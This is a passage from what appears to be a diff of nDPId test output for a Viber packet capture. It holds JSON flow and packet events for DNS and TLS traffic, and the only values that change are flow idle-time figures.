-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1527155641716,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1527155641716,"pkt":"AA6OMNv9MAdNo1+nCABFAAA025JAAEAGCjLAqAARNuZdYOCwAbu7GrjlFg8sv4AQAq0zmAAAAQEICgAhY3p+anA4"} -00847{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155641697,"flow_last_seen":1527155641717,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1527155641717,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.96","src_port":57520,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"media.cdn.viber.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00904{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":68,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155641697,"flow_last_seen":1527155641736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1632,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1527155641736,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.96","src_port":57520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"media.cdn.viber.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01165{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":70,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1527155641697,"flow_last_seen":1527155641736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4528,"flow_avg_l4_payload_len":566,"midstream":0,"thread_ts_msec":1527155641736,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.96","src_port":57520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"media.cdn.viber.com","server_names":"*.cdn.viber.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=thawte, Inc., CN=thawte SSL CA - G2","subjectDN":"C=LU, ST=Luxembourg, L=Luxembourg, O=Viber Media Sarl, OU=IT, CN=*.cdn.viber.com","alpn":"h2,http\/1.1","fingerprint":"B6:30:6F:02:75:A8:08:0A:AE:AA:9C:6C:9F:B5:8E:4C:82:02:3D:39"}} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155641697,"flow_last_seen":1527155641697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155641697,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.96","src_port":57520,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1527155641697,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155641697,"pkt":"AA6OMNv9MAdNo1+nCABFAAA825FAAEAGCivAqAARNuZdYOCwAbu7GrjkAAAAAKAC\/\/84\/wAAAgQFtAQCCAoAIWN1AAAAAAEDAwc="} 
+00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1527155641714,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155641714,"pkt":"MAdNo1+nAA6OMNv9CABFAAA8AABAAPQGMbw25l1gwKgAEQG74LAWDyy+uxq45aAScSCWXAAAAgQFtAQCCAp+anA4ACFjdQEDAwg="} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1527155641716,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1527155641716,"pkt":"AA6OMNv9MAdNo1+nCABFAAA025JAAEAGCjLAqAARNuZdYOCwAbu7GrjlFg8sv4AQAq0zmAAAAQEICgAhY3p+anA4"} +00847{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155641697,"flow_last_seen":1527155641717,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1527155641717,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.96","src_port":57520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"media.cdn.viber.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+00904{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":68,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155641697,"flow_last_seen":1527155641736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1632,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1527155641736,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.96","src_port":57520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"media.cdn.viber.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01165{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":70,"source":"viber.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1527155641697,"flow_last_seen":1527155641736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4528,"flow_avg_l4_payload_len":566,"midstream":0,"thread_ts_msec":1527155641736,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.96","src_port":57520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"media.cdn.viber.com","server_names":"*.cdn.viber.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=thawte, Inc., CN=thawte SSL CA - G2","subjectDN":"C=LU, ST=Luxembourg, L=Luxembourg, O=Viber Media Sarl, OU=IT, 
CN=*.cdn.viber.com","alpn":"h2,http\/1.1","fingerprint":"B6:30:6F:02:75:A8:08:0A:AE:AA:9C:6C:9F:B5:8E:4C:82:02:3D:39"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"viber.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155641813,"flow_last_seen":1527155641813,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1527155641813,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":40445,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"viber.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1527155641813,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1527155641813,"pkt":"AA6OMNv9MAdNo1+nCABFAABAH5VAAEARmafAqAARwKgAD539ADUALISKl70BAAABAAAAAAAACGRsLW1lZGlhBXZpYmVyA2NvbQAAAQAB"} 00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":82,"source":"viber.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155641813,"flow_last_seen":1527155641813,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1527155641813,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":40445,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Viber","breed":"Acceptable","category":"Chat"},"dns": {"query":"dl-media.viber.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00625{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"viber.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1527155641840,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":185,"pkt_l4_len":151,"thread_ts_msec":1527155641840,"pkt":"MAdNo1+nAA6OMNv9CABFAACrXElAAEARXIjAqAAPwKgAEQA1nf0Al5UFl72BgAABAAUAAAAACGRsLW1lZGlhBXZpYmVyA2NvbQAAAQABwAwABQABAAAGHQAfDmQxZmplOWdtM2QwNXQ4CmNsb3VkZnJvbnQDbmV0AMAwAAEAAQAAADsABDbmXTXAMAABAAEAAAA7AAQ25l1swDAAAQABAAAAOwAENuZdn8AwAAEAAQAAADsABDbmXWM="} 00785{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":83,"source":"viber.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1527155641813,"flow_last_seen":1527155641840,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1527155641840,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":40445,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Viber","breed":"Acceptable","category":"Chat"},"dns": {"query":"dl-media.viber.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.230.93.53"}} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":84,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155641845,"flow_last_seen":1527155641845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155641845,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.53","src_port":53934,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1527155641845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155641845,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8nXxAAEAGSGvAqAARNuZdNdKuAbvV1v7mAAAAAKAC\/\/\/mSAAAAgQFtAQCCAoAIWOaAAAAAAEDAwc="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1527155641865,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155641865,"pkt":"MAdNo1+nAA6OMNv9CABFAAA8AABAAPQGMec25l01wKgAEQG70q53C5Ep1db+56AScSB9zAAAAgQFtAQCCAp+anCqACFjmgEDAwg="} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1527155641867,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1527155641867,"pkt":"AA6OMNv9MAdNo1+nCABFAAA0nX1AAEAGSHLAqAARNuZdNdKuAbvV1v7ndwuRKoAQAq0bCAAAAQEICgAhY59+anCq"} -00847{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155641845,"flow_last_seen":1527155641868,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":183,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1527155641868,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.53","src_port":53934,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dl-media.viber.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00904{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":89,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155641845,"flow_last_seen":1527155641890,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1631,"flow_avg_l4_payload_len":271,"midstream":0,"thread_ts_msec":1527155641890,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.53","src_port":53934,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dl-media.viber.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01167{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":91,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1527155641845,"flow_last_seen":1527155641890,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4527,"flow_avg_l4_payload_len":565,"midstream":0,"thread_ts_msec":1527155641890,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.53","src_port":53934,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"dl-media.viber.com","server_names":"*.viber.com,viber.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=thawte, Inc., CN=thawte SSL CA - G2","subjectDN":"C=LU, ST=Luxembourg, L=Luxembourg, O=Viber Media Sarl, OU=IT, CN=*.viber.com","alpn":"h2,http\/1.1","fingerprint":"E1:11:26:E6:14:A5:E6:F7:F1:CB:68:D1:A6:95:A1:5E:11:48:72:2A"}} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":84,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155641845,"flow_last_seen":1527155641845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155641845,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.53","src_port":53934,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1527155641845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155641845,"pkt":"AA6OMNv9MAdNo1+nCABFAAA8nXxAAEAGSGvAqAARNuZdNdKuAbvV1v7mAAAAAKAC\/\/\/mSAAAAgQFtAQCCAoAIWOaAAAAAAEDAwc="} 
+00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1527155641865,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1527155641865,"pkt":"MAdNo1+nAA6OMNv9CABFAAA8AABAAPQGMec25l01wKgAEQG70q53C5Ep1db+56AScSB9zAAAAgQFtAQCCAp+anCqACFjmgEDAwg="} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1527155641867,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1527155641867,"pkt":"AA6OMNv9MAdNo1+nCABFAAA0nX1AAEAGSHLAqAARNuZdNdKuAbvV1v7ndwuRKoAQAq0bCAAAAQEICgAhY59+anCq"} +00847{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1527155641845,"flow_last_seen":1527155641868,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":183,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1527155641868,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.53","src_port":53934,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dl-media.viber.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+00904{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":89,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155641845,"flow_last_seen":1527155641890,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1631,"flow_avg_l4_payload_len":271,"midstream":0,"thread_ts_msec":1527155641890,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.53","src_port":53934,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dl-media.viber.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01167{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":91,"source":"viber.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1527155641845,"flow_last_seen":1527155641890,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4527,"flow_avg_l4_payload_len":565,"midstream":0,"thread_ts_msec":1527155641890,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.230.93.53","src_port":53934,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Viber","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dl-media.viber.com","server_names":"*.viber.com,viber.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=thawte, Inc., CN=thawte SSL CA - G2","subjectDN":"C=LU, ST=Luxembourg, L=Luxembourg, O=Viber Media Sarl, OU=IT, 
CN=*.viber.com","alpn":"h2,http\/1.1","fingerprint":"E1:11:26:E6:14:A5:E6:F7:F1:CB:68:D1:A6:95:A1:5E:11:48:72:2A"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":119,"source":"viber.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155644240,"flow_last_seen":1527155644240,"flow_idle_time":180000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1527155644240,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"172.217.23.106","src_port":41993,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"viber.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1527155644240,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":65,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":65,"pkt_l4_len":31,"thread_ts_msec":1527155644240,"pkt":"AA6OMNv9MAdNo1+nCABFAAAzV0lAAEARXnTAqAARrNkXaqQJAbsAHwH3DO5PoOHayJNED10MJ0pTvsIOJQ7muOI="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"viber.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1527155644243,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":65,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":65,"pkt_l4_len":31,"thread_ts_msec":1527155644243,"pkt":"AA6OMNv9MAdNo1+nCABFAAAzV0pAAEARXnPAqAARrNkXaqQJAbsAH4RqDO5PoOHayJNEEDIopLF1oa8UykhAnf8="} 
@@ -64,12 +64,12 @@ 00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":122,"source":"viber.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155646819,"flow_last_seen":1527155646819,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1527155646819,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":35331,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"app-measurement.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"viber.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1527155646840,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1527155646840,"pkt":"MAdNo1+nAA6OMNv9CABFAABRXJhAAEARXJPAqAAPwKgAEQA1igMAPcYV\/YeBgAABAAEAAAAAD2FwcC1tZWFzdXJlbWVudANjb20AAAEAAcAMAAEAAQAAASsABKzZF04="} 00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":123,"source":"viber.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1527155646819,"flow_last_seen":1527155646840,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1527155646840,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":35331,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"app-measurement.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.23.78"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":124,"source":"viber.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1527155646850,"flow_last_seen":1527155646850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1527155646850,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"172.217.23.78","src_port":43702,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 